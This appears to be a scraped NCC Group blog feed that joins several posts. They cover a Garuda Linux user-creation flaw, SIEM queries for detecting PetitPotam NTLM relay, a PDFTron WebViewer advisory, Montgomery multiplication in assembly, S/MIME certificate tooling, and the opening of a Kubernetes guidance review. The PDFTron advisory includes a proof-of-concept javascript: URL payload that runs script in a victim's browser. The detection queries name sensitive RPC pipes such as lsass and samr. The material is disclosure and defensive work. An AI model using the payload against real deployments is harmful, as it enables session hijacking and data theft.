This step generates an authentication pop-up, and so does the step2 when the password is set: 

args[“arguments”] = QStringList() << username; 
args[“writeArgs”] = QStringList() << password << password; 
installActionUsersChangePassword.setArguments( args ); 
KAuth::ExecuteJob* jobChangePassword = installActionUsersChangePassword.execute() 

Each KAuth is doing an elevation and showing the authentication-popup, so it appears twice in the practice. 

Between step1 and step2 the user is created without password and without account lock: 

  • shadow:   myuser::18841:0:99999:7:: 
  • passwd:   myuser:x:1003:1004::/home/myuser:/bin/bash 

Despite this momentary insecure state of the created user, the configuration in Garuda doesn’t allow using command “su” to an account that doesn’t have a password. 

But the Garuda switch-user authenticates well on this user with any random password. 

Recommendation

The current download version is fixed, and also an upgrade is available. Users are recommended to upgrade to the most recent version.

In case of doubt, don’t use the Garuda’s users creation panel; the users can be created using the console. 

Vendor Communication

August 9 2021:  The vulnerability was discovered during vacation. 

September 10 2021:  A ticket is created on vendor’s gitlab. 

September 10 2021: The vulnerability is fixed in commit 29b03856

Acknowledgements

Thanks to the Garuda developers for quickly fixing the vulnerability. 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  September 29 2021

Written by:  Jesus Olmos 

Detecting and Hunting for the PetitPotam NTLM Relay Attack

23 September 2021 at 18:34

Overview

During the week of July 19th, 2021, information security researchers published a proof of concept tool named “PetitPotam” that exploits a flaw in Microsoft Windows Active Directory Certificate Servers with an NTLM relay attack.  The flaw allows an attacker to gain administrative privileges of an Active Directory Certificate Server once on the network with another exploit or malware infecting a system.  

The following details are provided to assist organizations in detecting and threat hunting for this and other similar types of threats.

Preparation

The default settings of Windows logging do not often catch advanced threats.  Therefore, Windows Advanced Audit Logging must be optimally configured to detect and to be able to threat hunt PetitPotam and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

Log rotation can be another major issue with Windows default log settings.  Both the default log size should be increased to support detection engineering and threat hunting.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data.

Detecting and Threat Hunting NTLM Relay Attacks

The PetitPotam attack targets Active Directory servers running certificate services, so this will be the focus of the detection and hunting.  Event log data is needed to detect or hunt for PetitPotam. The following settings and events can be used to detect this malicious activity:

Malicious Logins

PetitPotam will generate an odd login that can be used to detect and hunt for indications of execution.  To collect Event ID 4624, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used:

  • Event Log = Security
  • Event ID = 4624
  • User = ANONYMOUS LOGON
  • Authentication Package Name = NTLM*
  • Elevated Token – *1842

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”4624″ and winlog.event_data.AuthenticationPackageName=”NTLM*” and winlog.event_data.ElevatedToken=”*1842″ | PackageName:=winlog.event_data.AuthenticationPackageName | Token:=winlog.event_data.ElevatedToken | WS_Name:=winlog.event_data.WorkstationName | LogonProcess:=winlog.event_data.LogonProcessName | LogonType:=winlog.event_data.LogonType | ProcessName:=winlog.event_data.ProcessName | UserName:=winlog.event_data.SubjectUserName | Domain:=winlog.event_data.SubjectDomainName | TargetDomain:=winlog.event_data.TargetDomainName | TargetUser:=winlog.event_data.TargetUserName | Task:=winlog.event_data.TargetUserName| table([event.code, @timestamp, host.name, event.outcome, WS_Name, UserName, Domain, Token, PackageName, LogonProcess, LogonType, ProcessName, TargetDomain, TargetUser, Task])

Malicious Share Access

PetitPotam will generate odd network share connections that can be used to detect and hunt for indications of execution.  To collect Event ID 5145, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Object Access – Audit Detailed File Share = Success
  • Object Access – File Share = Success

The following query logic can be used:

  • Event Log = Security
  • Event ID = 5145
  • Object Name = *IPC*
  • Target Name = (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon”

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”5145” and winlog.event_data.ShareName=*IPC* and (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon” or “srvsvc”)
    | Status:= keywords[0] | Src_IP:= winlog.event_data.IpAddress | PID:= winlog.process.pid | UserName:=winlog.event_data.SubjectUserName | Domain:= winlog.event_data.SubjectDomainName | Target_File:= winlog.event_data.RelativeTargetName | Path:= winlog.event_data.ShareLocalPath | Share:= winlog.event_data.ShareName | ObjectType:=winlog.event_data.ObjectType
    | table([event.code, @timestamp, host.name, Status, Src_IP, PID, UserName, Domain, task, Path, Share, Target_File, ObjectType])

If you find any false positives, validating them and excluding or refining the query may be needed.  We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks.

Additional Reading and Resources

Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)

14 September 2021 at 13:52
Vendor: PDFTron
Vendor URL: https://www.pdftron.com/
Versions affected: WebViewer UI 8.0 or below
Systems Affected: Web applications hosting the affected software
Author: Liyun Li <liyun.li[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-39307

Summary

PDFTron’s WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.

Impact

An attacker could steal a victim’s session tokens, log their keystrokes, steal private data, or perform privileged actions in the context of a victim’s session.

Details

JavaScript URLs are dangerous because they can be used to execute arbitrary JavaScript code when visited. Built-in PDF readers in modern browsers, such as Mozilla’s pdf.js, do not render code-execution-capable URLs as hyperlinks to avoid this issue.

To reproduce this issue, first create the following HTML document and save the rendered content as PDF on a modern browser.

<h2><a href="javascript:document.write`
  <div>
    <form method='GET' action='https://nccgroup.com'>
      <input type='submit' value='NCC Group'>
    </form>
    <script>alert(document.domain)</script>
  </div>
`">Click me</a></h2>

After that, use the “d” parameter to include the uploaded PDF file (e.g. http://webviewer-instance/#d=https://domain.tld/test.pdf).

Support for rendering clickable JavaScript and Data URL should be removed.

Recommendation to Users

Upgrade WebViewer UI to 8.1, available at https://www.pdftron.com/documentation/web/download.

Vendor Communication

2021-08-16: Issue reported to PDFTron
2021-08-17: PDFTron confirmed the vulnerability
2021-08-23: PDFTron issued patch to nightly build
2021-09-09: PDFTron WebViewer 8.1 released 
2021-09-14: Advisory released by NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  September 14, 2021

Written by:  Liyun Li

Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly

10 September 2021 at 08:30

This is the second blog post in a new code-centric series about selected optimizations found in pairing-based cryptography. Pairing operations are foundational to the BLS Signatures central to Ethereum 2.0, the zero-knowledge arguments underpinning Filecoin, and a wide variety of other emerging applications.

While my prior blog series, “Pairing over BLS12-381,” implemented the entire pairing operation from start to finish in roughly 200 lines of high-level Haskell, this current blog series, “Optimizing Pairing-Based Cryptography” looks at lower-level performance optimizations in more operational systems. The first post in this series covered modular Montgomery arithmetic in Rust from start to finish. This second post takes the Montgomery multiplication algorithm developed in Rust even further to seek the maximum performance a modern x86-64 machine can deliver from an implementation hand-written in assembly language. Several specialized instructions and advanced micro-architectural features enabling increased parallelism result in a Montgomery multiplication routine running more than 15X faster than a generic Big Integer implementation.

Overview

Pairing-based cryptography is fascinating because it utilizes such a wide variety of concepts, algorithms, techniques and optimizations. For reference, the big picture on pairing can be reviewed in the prior series of blog posts listed below.

Pairing over BLS12-381, Part 1: Fields
Pairing over BLS12-381, Part 2: Curves
Pairing over BLS12-381, Part 3: Pairing!

This current blog post focuses on optimizing the most expensive of basic field arithmetic operations: modular multiplication. First, a reference function implemented in Rust with the BigUint library crate is presented alongside a similar reference function adapted for use with Montgomery-form operands. Second, a more optimized routine utilizing operands constructed solely from 64-bit unsigned integers and developed in the prior blog post is presented – this serves as the jumping-off point for assembly language optimization. Third, the complete assembly routine is developed and described with interspersed insights on CPU architecture, micro-architecture, and register allocation. This post then wraps up with some figure of-merit benchmarking results that compare the various implementations.

All of the code is available, ready-to-run and ready-to-modify for your own experimentation. The code is nicely self-contained and understandable, with zero functional dependencies and minimal test/build complexity. On Ubuntu 20.04 with Rust, git and clang preinstalled, it is as simple as:

$ git clone https://github.com/nccgroup/pairing.git
$ cd pairing/mont2
$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench

The Reference Operations

Rust, along with the BigUint library crate, makes the basic modular multiplication operation exceptionally easy to code. The excerpt below defines the BLS12-381 prime field modulus with the lazy_static macro and then proceeds to implement the modular multiplication function mul_biguint() using that fixed modulus. This reference function corresponds to the modular multiplication performance a generic application might achieve, and is used later as the benchmark baseline. [Code excerpt on GitHub]

As described in the prior blog post, the Montgomery multiplication algorithm has a lot more potential for performance optimization but uses operands in the Montgomery form ã = a · R mod N, where a is the normal value (or normal form), N is the MODULUS and R is 2384 in our scenario. When operands in Montgomery form are multiplied together, an instance of R−1 needs to be factored into the calculation in order to maintain the result in correct Montgomery form. Thus, the actual operation is mont_mul(ã, b̃) = ã · b̃ · R−1 mod N. The code below declares the R−1 = R_INV constant as calculated in the prior blog post, utilizes the same MODULUS constant declared above, and so implements our mont_mul_biguint() Montgomery multiplication reference function. [Code excerpt on GitHub]

Note that the above function currently has even worse performance characteristics than the prior baseline. This is due to the additional multiplication involving R_INV delivering an even larger input to the very expensive modular reduction operator which involves a division operation. However, it can serve as a more formalized definition of correct functionality, so it will be used internally to support the test code which compares actual versus expected results across different implementations. As an aside, recall that the extra expense of converting the operands to/from Montgomery form is expected to be amortized across many (hopefully now much faster) interim operations.

Montgomery Multiplication Using Rust’s Built-In Types

The primary issue with each of the above multiplication routines is the expensive division lurking underneath the modulo operator. The BigUint crate is wonderful in that it supports both arbitrary precision operands and moduli. However, this flexibility precludes some of the aggressive performance optimizations that can be implemented with fixed-size operands and a constant modulus.

The Rust code shown below from the prior blog post introduces the fixed data structure used for the operands. Operands consist of an array of six 64-bit unsigned integers, each known as a limb. This is followed by the ‘magic constant’ N_PRIME derived in the prior blog post for use in the reduction step, and then the complete Montgomery multiplication function using only Rust’s built-in operators and data types. [Code excerpt on GitHub]

There are three interesting and related things to observe in the code above.

  1. A temp array is declared on line 107 that is capable of holding twelve 64-bit limbs. Intuitively, that size makes sense since the overall operation involves a multiplication of two operands, where each operand consists of six 64-bit limbs, so a ‘double-width’ intermediate result is appropriate.
  2. The outer loop wraps a partial product step in the first inner loop followed by a reduction step in the second inner loop, and the outer loop index i always acts as a base address whenever the temp array is accessed. Looking more closely at the logic executed during each outer loop iteration, only seven limbs of the temp array are ever active, which is a noticeably smaller working set relative to the overall size of twelve in the temp declaration.
  3. As the outer loop iterates, the code essentially steps forward through the working set of the temp array from least significant toward most significant limb, never going fully backwards. In fact, incrementing the loop index i and using it as a base address means the least significant values are effectively falling away one at a time; the final result is derived from only the most significant six limbs of the temp array.

These three observations suggest that it is possible to elegantly implement the work done inside the outer loop within only a handful of active registers. The outer loop can then either iterate as shown or be unrolled, while it shifts the working set one step forward through the temp array each time.

An Aside: CPU Architecture, Micro-architecture, and Register Allocation

Some basic foundation needs to be built prior to jumping into the assembly language implementation. While the term ‘CPU Architecture’ does not have a single, simple or perfectly agreed-upon definition, in this context it describes the higher-level software instruction set and programming model of a processor system – the programmer’s view. At a lower level, the term ‘CPU Micro-architecture’ then describes how a specific processor implementation is logically organized to execute that instruction set – these underlying mechanisms are largely hidden from the application programmer. Both areas have seen tremendous progress and greater complexity over time in the never ending quest for performance that largely comes from increased parallelism. There are a few things to observe for each topic, starting from the lower-level and working upwards.

CPU Micro-architecture

A view into the micro-architecture of Intel’s Core2 machine is shown below. While that machine is over a decade old, the diagram remains very instructive and more modern versions have similar structure with greatly increased capacities. The assembly code we soon develop should run well on all modern Intel and AMD x86-64 processors shipped within the past 5 years (at least).

https://commons.wikimedia.org/w/index.php?curid=2541872 CC BY-SA 3.0

There are four interesting things to observe in the diagram above.

  1. The (pink) instruction fetch logic is capable of supplying six instructions from the fetch buffer to the instruction queue per cycle. Clearly the intent is to keep the multiple parallel execution units downstream (described next) stuffed full of work.
  2. The (yellow) execution units are capable of executing multiple similar and dissimilar operations in parallel. The configuration is intended to support many simple and frequent operations separately from the fewer, more complex and rarer operations. The various operations will clearly involve very different throughput and latency characteristics.
  3. The (salmon) reservation station helps manage the operand dependencies between instructions, and the register alias table allows for more physical registers than logical registers. The adjacent reorder buffer and retirement register file logic allows instructions to execute out-of-order but get committed in-order. While humans typically think in a nice orderly step-by-step fashion, the actual instruction execution patterns can go wildly out-of-order (provided they are ultimately finalized in-order).
  4. While the specific individual pipeline stages are not shown, modern processors have very deep pipelines and thus require extensive branch prediction logic to minimize overhead from mispredictions. This is pertinent to unrolling small loops.

The four items above allow the processor to extract a large amount of the underlying instruction-level parallelism throughout each of the fetch, decode, execute and finalize/retire steps. It is quite fantastic that all of this complexity is effectively hidden from the application programmer. A bigger, better and newer micro-architecture should simply result in better performance on strictly unchanged code.

CPU Architecture

In some cases, specialized instructions are added to the programming model that provide significant speed-up for very specific algorithms. While many people first think of the very well-known ‘Intel MMX instructions for multimedia algorithms’, there have been many other less prominent instances over the years. Intel’s ADX (Multi-Precision Add-Carry Instruction Extensions) feature provides two new addition instructions that can help increase the performance of arbitrary precision arithmetic. Intel’s BMI2 (Bit Manipulation Instruction Set 2) feature contains a new flag-friendly multiplication instruction among several others not relevant to our purpose. Processors supporting these feature extensions have been shipping since roughly 2015, and may offer a significant performance benefit.

The ‘native’ Montgomery multiplication Rust code last shown above involved a large amount of addition operations (outside of the array index calculation) centered around lines 112-114, 118, 124-125 and 129. These operations are building larger-precision results (e.g., a full partial product) from smaller-precision instructions (e.g., a 64-bit add). Normally, a series of ‘Add with carry’ (ADC) instructions are used that add two operands and the carry(in) flag to produce a sum and a new carry(out) flag. The instructions are ordered to work on the least-to-most significant operand limb one at a time. The dependence upon a single carry flag presents a bottleneck that allows just one chain to operate at a time in principle, thus limiting parallelism.

Intel realized the limitation of a single carry flag, and introduced two instructions that effectively use different carry flags. This allows the programmer to express more instruction-level parallelism by describing two chains that can be operating at the same time. The ADX instruction extensions provide:

  • ADCX Adds two 64-bit unsigned integer operands plus the carry flag and produces a 64-bit unsigned integer result with the carry out value set in the carry flag. This does not affect any other flags (as the prior ADD instructions did).
  • ADOX Adds two 64-bit unsigned integer operands plus the overflow flag and produces a 64-bit unsigned integer result with the carry out value set in the overflow flag. This does not affect any other flags. Note that ordinarily the overflow flag is used with signed arithmetic.

Meanwhile, the Rust code also contains a significant amount of multiplication operations interspersed amongst the addition operations noted above. The ordinary MUL instruction multiplies two 64-bit unsigned integer operands to produce a 128-bit result placed into two destination registers. However, this result also affects the carry and overflow flags – meaning it will interfere with our ADCX and ADOX carry chains. Furthermore, the output registers must be %rax and %rdx which limits flexibility and constrains register allocation. To address this, the BMI2 instruction extensions include:

  • MULX Multiplies two 64-bit unsigned integer operands and produces an unsigned 128-bit integer result stored into two destination registers. The flags are not read nor written, thus enabling the interleaving of add-with-carry operations and multiplications.

The two new addition instructions inherently overwrite one of the source registers with the destination result. In other words, adcxq %rax, %r10 will add %rax to %r10 with the carry flag, and place the result into %r10 and the carry flag. The new multiplication instruction requires one of its source operands to always be in %rdx. In other words, mulxq %rsi, %rax, %rbx is the multiplication of %rsi by %rdx with the lower half of the result written into %rax and the upper half written into %rbx. The q suffix on each instruction is simply the quadword suffix syntax of the GNU Assembler.

Register Allocation

The three new instructions described above will form the core of the Montgomery multiplication function in assembly. Since the x86 instruction set is rather register constrained, a strategy that minimizes the actual working set of active values must be developed. We saw earlier how only seven limbs of temp are in play at any one time and the outer loop index i formed a base address when accessing temp. Consider a ‘middle’ iteration of the outer loop, as the simpler first iteration can be derived from this. This flattened iteration is implemented as an assembler macro that can be later placed singly inside an outer loop or in multiple back-to-back instances that unroll the outer loop.

The first inner loop calculating the partial product will be unrolled and assumes temp[i + 0..6] (exclusive) arrives in registers %r10 through %r15. The %rax and %rbx registers will temporarily hold multiplication results as we step through a.v[0..6] * b.v[i] (with a fixed i). The a.v[0..6] (exclusive) operands will involve a relative address using %rsi as the base, while the fixed operand will be held in %rdx. At the end of the inner loop, the %rbp register will be used to hold temp[i + 6].

The second inner loop implementing the reduction step will also be unrolled and assumes temp[i + 0..7] (exclusive) is provided in the registers %r10 through %r15 along with %rbp. The register strategy for holding the multiplication results is modified slightly here due to A) the add instruction requiring a source operand being overwritten by the result, and B) the calculation process effectively shifts the working set to the right by one step (thus the least significant value will drop away, but its carry out will still propagate).

Basic Register Allocation Structure/Plan

The general plan for register allocation within one ‘middle’ iteration of the outer loop is shown above in simplified fashion. The upper crimson triangle implements the partial product inner loop and is executed first. The lower green triangle implements the reduction step and executes second. Double-width boxes hold the multiplication results, and the red/green arrows identify the two separate carry chains of the addition instructions. The nearly side-by-side placement of the addition operations is meant to hint at their parallel operation. While things visually appear to step forward in a nice orderly single-cycle progression, multiplication latencies are significantly higher than addition so the out-of-order capabilities of the micro-architecture is crucial to performance. The output data within %r10 through %r15 is compatible with input data within %r10 through %r15, so instances of this block can be repeated one after another.

The initial iteration of the outer loop is a simplification of that shown above. Simply assume %r10 through %r15 start at zero and remove everything no longer needed.

Montgomery Multiplication in Assembly

The bulk of the hard work has now been done. A macro implementing one iteration of the outer loop in x86-64 assembly is shown below. The fully unrolled outer loop is implemented with a simplified initial instance followed by five back-to-back instantiations of this code. [Code excerpt on GitHub]

The final Montgomery multiplication function is fully implemented in src/mont_mul_asm.S and is a straightforward concatenation of the following elements:

  1. A function label attached to the prologue. Any registers used by the function that are required to be preserved across function calls must be pushed to the stack prior to use. The label corresponds to the extern “C” clause in the Rust lib.rs source file.
  2. The MODULUS is stored as quadword constants and their address loaded into the %rcx register. These values are utilized in the reduction step.
  3. An instance of the simplified first outer loop.
  4. Five instances of the macro shown above. Note the presence of offset parameter on line 82. This is used to form an index into b.v[i] on line 84 and it is increased by 8 on each instance.
  5. The final modulus correction logic is virtually identical to what has already been seen for addition: subtract the modulus from the initial result and return that if there is no borrow, otherwise return the initial result.
  6. A function epilogue that pops the registers from the stack that were pushed there in the prologue.

Again, the full routine can be seen in its totality here on GitHub. Note that the Rust build.rs source file integrates everything with cargo such that there are no additional steps required to build.

A final aside: Unrolling Rust and intrinsics

The code repository already fully supports further experimentation with A) flattened Rust code that uses the same strategy to minimize its active working set, and B) Rust intrinsics. Let’s briefly touch on both topics before including them in the benchmarking results described next.

The assembly code can be back-ported or re-implemented back into flat/raw Rust with the same ‘register allocation’ strategy to manage the active working set and avoid declaring a temp[] array. This gives surprisingly good results and suggests that a modern micro-architecture can look even further ahead, perhaps up to 200 (simple) instructions, to extract more instruction level parallelism from separate but adjacent carry chains. Hence the old adage: “You can rarely outsmart the compiler”. Look for the fe_mont_mul_raw() function.

Alternatively, Rust provides intrinsics that specifically target the ADCX, ADOX and MULX instructions. Unfortunately, the toolchain cannot emit the first two yet. Nonetheless, the fe_mont_mul_intrinsics() function shows exactly how this is coded. The MULX instruction is indeed emitted and does deliver a significant benefit by not interfering with the flags.

Benchmarking

Everything is ready to go – let’s benchmark! Here are sample results from my machine:

$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench
Ubuntu 20.04.2 LTS on Intel Core i7-7700K CPU @ 4.20GHz with Rust version 1.53

1. Addition X 1000 iterations                                       [3.6837 us 3.6870 us 3.6905 us]
2. Subtraction X 1000 iterations                                  [3.1241 us 3.1242 us 3.1244 us]
3. Multiplication by BigUint X 1000 iterations:            [517.54 us 517.68 us 517.85 us]
4. Multiplication in Rust (mont1 blog) X 1000 iter:     [46.037 us 46.049 us 46.064 us]
5. Multiplication in flat Rust X 1000 iterations:           [34.719 us 34.741 us 34.763 us]
6. Multiplication in Rust with intrinsics X 1000 iter:    [31.497 us 31.498 us 31.500 us]
7. Multiplication in Rust with assembly X 1000 iter:    [29.573 us 29.576 us 29.580 us]

There are three caveats to consider while interpreting the above results. First and foremost, consider these results as a qualitative sample rather than a definitive result. Second, each result is presented as minimum, nominal and maximum timing – so the key figure is the central number. Finally, each function is timed across 1000 iterations, so the timing result for a single iteration correspond to units of nanoseconds rather than microseconds. On this machine, the Montgomery multiplication function written in assembly language takes approximately 29.576 ns.

The baseline non-Montgomery multiplication function utilizing BigUint is shown in entry 3. The (non BigUint) Montgomery multiplication function developed in the prior post is entry 4. The benefits of actively managing the working set and unrolling the inner loops can be seen in entry 5. The benefit of the MULX intrinsic appears in entry 6. Pure assembly is shown in entry 7. While the assembly routine provides more than 15X performance improvement over the BigUint reference implementation in entry 3, it also utilizes the CMOV instructions in the final correction steps to reduce timing side-channel leakage relative to all other entries.

What we learned

We started with a reference multiplication routine utilizing the BigUint library crate as our performance baseline. Then we adapted the Montgomery multiplication function in Rust from the prior blog post into an equivalent x86-64 assembly language version that is over 15X faster than the baseline. Along the way we looked at how the micro-architecture supports increased parallelism, how several new instructions in the architecture also support increased parallelism, and got insight into how to use the instructions with planned register allocations. A few hints (leading to intentionally unanswered questions) were dropped regarding the potential of raw Rust and intrinsics, with further investigation left as an exercise for the reader. Finally, we benchmarked a broad range of approaches.

The code is available publicly on GitHub, self-contained and ready for further experimentation.

What is next?

As mentioned at the start, pairing-based cryptography involves a wide range of algorithms, techniques and optimizations. This will provide a large menu of follow-on optimization topics which may ultimately include the polynomial-related functionality that zkSNARKS utilize with pairings. Stay tuned!!

Thank you

The author would like to thank Parnian Alimi, Paul Bottinelli and Thomas Pornin for detailed review and feedback. The author is solely responsible for all remaining issues.

CertPortal: Building Self-Service Secure S/MIME Provisioning Portal

10 September 2021 at 06:48

tl;dr

NCC Group’s Research & Development team designed and built CertPortal which allows users to create and manage S/MIME certificates automating the registration and renewal to allow enterprise scale deployment.

The core of the system integrates DigiCert to create an S/MIME certificate and then storing both the certificate, the password, creation and expiry dates in a CyberArk safe. It then publishes the public certificate in the Microsoft Exchange Global Address List against the user’s account.

The portal presents the user with the two options of ‘show me my password’ and ‘download certificate’. This approach has removed a number of manual processes whilst providing significant efficiency and security gains.

The Beginning

Encryption as standard is both a crowning jewel and a backbone of modern HTTP traffic, so much so that browsers warn users of websites that do not offer it. On top of that, services like Let’s Encrypt make the process of adding encryption to a public facing website easy.

In the world of S/MIME this is not the case. There are services such as DigiCert or Entrust which allow API users to automatically generate S/MIME certificates but this still leaves a large earnest on the IT team to run the scripts to generate a password and private key, request a certificate, then securely deliver all of the above to the end user.

In steps CertPortal, an S/MIME self-service portal to fill this void. It needs to be able to do three things well:

  1. On request generate a password, private key, and CSR, request a certificate, and generate a PFX file.
  2. Securely store those files and retrieve them on request.
  3. Provide a simple-to-use interface for users to perform the first two things.

In this post we will be discussing the first thing: Generating an S/MIME certificate.

Passwords, Private Keys, and CSRs

Assuming we have received a request to generate an S/MIME certificate the first thing we need to do is prepare ourselves to request a certificate from our Certificate Authority. This requires us to create a cryptographically secure password, a private key, and a Certificate Signing Request (CSR).

Secure Passwords

The first step is to generate a secure password, fortunately for us since Python 3.6 the secrets module has been available which makes this process fairly straight forward. We want our script to be repeatable so we will store our generated password on local disk so if we have a failure later on in the pipeline we can easily restart the process to try again.

This means we need to check our storage directory for an existing password file and return the contents if found. Otherwise we need to generate a cryptographically secure password, store it in the storage directory, and return the newly generated password.

import os
import secrets

PWD_CHRS = "[email protected]#$%^&*-+=,."
PWD_LEN = 16


def get_password(storage_dir: str) -> bytes:
    pwd_file = os.path.join(storage_dir, 'password.txt')
    try:
        with open(pwd_file, 'rb') as f:
            password = f.read()
    except FileNotFoundError:
        list_rand_chrs = [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
        password_str = ''.join(list_rand_chrs)
        password = password_str.encode('utf-8')
        with open(pwd_file, 'wb') as f:
            f.write(password)

    return password

The interesting line from the above excerpt is generating the password. Choosing the password characters and length is a matter for your own security policies. There are three steps to generating the password:

  1. Generate a list of random characters: secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)
  2. Convert the list into a string ''.join(list_rand_chrs).encode('utf-8')
  3. Convert the list into its bytes representation: ''.join(list_rand_chrs).encode('utf-8')

Private Keys

Once we have a password the next step is to generate a private key. To achieve this we will use the cryptography package. Like the previous step we want this step to be robust and repeatable.

This means we need to check our storage directory for an existing private key file, loading it using the password, and return it. Otherwise we generate a new private key with the password, store it in the storage directory, and return the private key.

import os

from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

KEY_SIZE = 4096


def get_private_key(storage_dir: str, password: bytes):
    key_file = os.path.join(storage_dir, 'private.key')
    try:
        with open(key_file, 'rb') as f:
            key = load_pem_private_key(
                f.read(), password, default_backend())
    except (ValueError, FileNotFoundError):
        key = rsa.generate_private_key(
            public_exponent=65537,
            backend=default_backend(),
            key_size=KEY_SIZE)

        with open(key_file, 'wb') as f:
            f.write(key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.BestAvailableEncryption(password)))

    return key

This process is fairly straight forward when you know what you’re doing. The important part is choosing the key size which needs to be a power of 2 (at least 2048).

Certificate Signing Requests

The last part of this step is creating the Certificate Signing Request (CSR). To achieve this simply follow the tutorial provided by the cryptography package with a couple of minor amendments:

csr = x509.CertificateSigningRequestBuilder().subject_name(x509.Name([
    # Provide various details about who we are
    x509.NameAttribute(NameOID.COMMON_NAME, csr_attrs['common_name']),
    x509.NameAttribute(NameOID.COUNTRY_NAME, csr_attrs['country_name']),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, csr_attrs['state_name']),
    x509.NameAttribute(NameOID.LOCALITY_NAME, csr_attrs['locality_name']),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, csr_attrs['organization_name']),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, csr_attrs['organization_unit_name']),
])
).add_extension(x509.SubjectAlternativeName([
    x509.DNSName(csr_attrs['common_name'])
]), critical=False
).sign(key, hashes.SHA512(), cryptography_default_backend())

We need to set the ‘Common Name’ and subject ‘Alternative Name’ as the email address the S/MIME is being generated for. There is no need to check the storage directory for an existing CSR as, unlike the password and private key, the CSR will be the same every time (if we use the same private key).

Asking the Certificate Authority

Now that we have a password, private key, and CSR we can move onto asking the Certificate Authority (CA) for an S/MIME certificate. This step will vary depending on which provider we are going to use but the basic process is the same for all:

  1. Authenticate with their API
  2. Request a new S/MIME type certificate from their API
  3. Store the request ID returned for future reference
  4. Waiting until the S/MIME certificate has been issued
  5. Download the certificate (including all chain certificates)
  6. Store the certificates in the same storage directory as the password, private key, and CSR

Bundle into a PFX (PKCS12) file

Lastly, we need to bundle the private key, S/MIME certificate, and chain certificates into a PFX (PKCS12) file for our end user to be able to download via the portal. To do this we will require one more Python package: OpenSSL (note that the cryptography package has since added PKCS12 serialization since version 3, however CertPortal currently uses version 2). Like the CSR, the process here is straightforward when you know what you are doing:

from OpenSSL import crypto


def get_pfx(storage_dir: str, cert, chain: list, key, password: bytes, friendly_name: bytes = None):
    """
    Generate a PFX (PKCS12) from the certificate(s), key, and password then store it in a file
    called `smime.pfx` inside `storage_dir`.
    :param storage_dir: Directory to store the PFX file
    :param cert: cryptography S/MIME certificate
    :param chain: List of cryptography chain certificates issued by the CA
    :param key: The cryptography private key
    :param password: The private key password
    :param friendly_name: The friendly name in the PKCS #12 structure
    """
    pfx = crypto.PKCS12()
    pfx.set_friendlyname(friendly_name or b'S/MIME Certificate')
    pfx.set_privatekey(crypto.PKey.from_cryptography_key(key))
    pfx.set_certificate(crypto.X509.from_cryptography(cert))
    pfx.set_ca_certificates([crypto.X509.from_cryptography(c) for c in chain])
    pfx_data = pfx.export(password)

    with open(os.path.join(storage_dir, certificate_file_name('pfx')), 'wb') as f:
        f.write(pfx_data)

    return pfx

We start by creating a crypto.PKCS12 object and setting a friendly name for the certificate. Next we set the private key. Then we set the S/MIME certificate (after converting from the cryptography key) and the same for the CA certificates. Finally we export the data and store it in the storage directory.

Conclusion

At the end of this process we have a secure password, private key, CSR, and PFX ready to be downloaded by the end user. We still need to be able to securely store these files and provide an interface for an end user to generate a new certificate and access existing certificates. We will address the secure storage in a future post.

We hope that this post has given you a good understanding of the how to create an S/MIME certificate progamtically.

Final remarks

We have only looked at the bare bones of this process and as such skipped over many best practices such as storing the configurations, using interfaces and implementing CA specific backends, etc. These are, however, outside the scope of the post.

NSA & CISA Kubernetes Security Guidance – A Critical Review

9 September 2021 at 15:08

Last month, the United States’ National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report (CTR) detailing the security hardening they recommend be applied to Kubernetes clusters, which is available here. The guidance the document contains is generally reasonable, but there are several points which are either incorrect or do not provide sufficient context for administrators to make good security-focused decisions.

In this blog post, we begin by outlining the general guidance (“The Good“), and then highlight some points where the CTR is either misleading or incorrect (“The Bad” and “The Complex“). This post is split into three parts:

  1. The Good
  2. The Bad: Places where the NSA/CISA guidance overlooked important aspects of Kubernetes security, or where the guidance was out of date at time of publication.
  3. The Complex: Considerations for some of the more common complex use cases not covered by the CTR guidance, including useful audit configurations that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

The Good

